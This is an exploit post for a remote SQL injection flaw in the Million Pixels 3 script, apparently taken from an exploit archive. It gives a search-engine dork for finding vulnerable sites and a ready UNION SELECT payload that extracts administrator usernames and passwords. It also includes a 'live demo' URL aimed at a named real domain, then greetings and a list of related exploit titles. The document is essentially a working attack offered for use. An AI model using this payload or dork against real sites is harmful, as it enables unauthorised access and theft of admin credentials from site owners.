#################################################################

#

# Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability

#

#========================================================

# =

# Author: Hussin X =

# =

# Home : www.tryag.cc/cc

# =

# email: darkangel_g85[at]Yahoo[DoT]com =

# =

# =

#========================================================

#

# script : http://e-topbiz.com/oprema/pages/millionpixels3.php

#

# DorK : inurl: "tops_top.php? id_cat ="

#################################################################

Exploit:

www.[target].com/Script/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins/*

L!VE DEMO:

http://e-topbiz.com/trafficdemos/pixel3/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins/*

########################( Greetz )###########################

# #

# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke #

# #

# Iraqihack / FAHD / mos_chori / Silic0n #

# #

#############################################################

Im IRAQi

【Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability】相关文章：

★ Rianxosencabos CMS 0.9 Remote Add Admin Exploit

★ phsBlog 0.2 Bypass SQL Injection Filtering Exploit

★ pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit

★ LoveCMS 1.6.2 Final Remote Code Execution Exploit

★ fuzzylime cms 3.01 (commrss.php) Remote Code Execution Exploit

★ Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln

★ minb 0.1.0 Remote Code Execution Exploit

★ IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit

★ Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit

★ VMware Workstation (hcmon.sys 6.0.0.45731) Local DoS Vulnerability